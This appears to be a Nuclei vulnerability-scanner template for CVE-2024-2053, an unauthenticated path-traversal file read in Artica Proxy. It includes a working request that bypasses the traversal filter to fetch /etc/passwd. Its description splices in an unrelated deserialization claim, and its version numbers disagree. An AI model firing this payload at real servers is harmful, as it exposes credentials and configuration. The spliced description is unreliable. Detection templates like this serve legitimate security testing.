id: CVE-2024-2053 info: name: Artica Proxy - Unauthenticated LFI author: pussycat0x severity: high description: | The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user. impact: | Unauthenticated attackers can read arbitrary files on the server including configuration files with credentials and other sensitive data. remediation: | Update Artica Proxy to a version newer than 4.50. reference: - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2053.md#cve-2024-2053 - https://seclists.org/fulldisclosure/2024/Mar/11 - https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-2053 cwe-id: CWE-23 epss-score: 0.36545 epss-percentile: 0.97213 cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:* metadata: vendor: articatech product: artica_proxy shodan-query: http.html:"artica" fofa-query: body="artica" verified: true max-request: 1 tags: cve,cve2024,lfi,artica-proxy,articatech,vuln,vkev http: - raw: - | GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: body words: - "application/force-download" - type: status status: - 200 # digest: 4a0a00473045022058f078e0973b2d4478430786fb8be95ccf5941e9e27211d71ff69e3a6f189f31022100eefbb7ae00d48ea66acbb3001e14de7d85df96c579bf4b9ea2bb2cba23d8762f:922c64590222798bb761d5b6d8e72950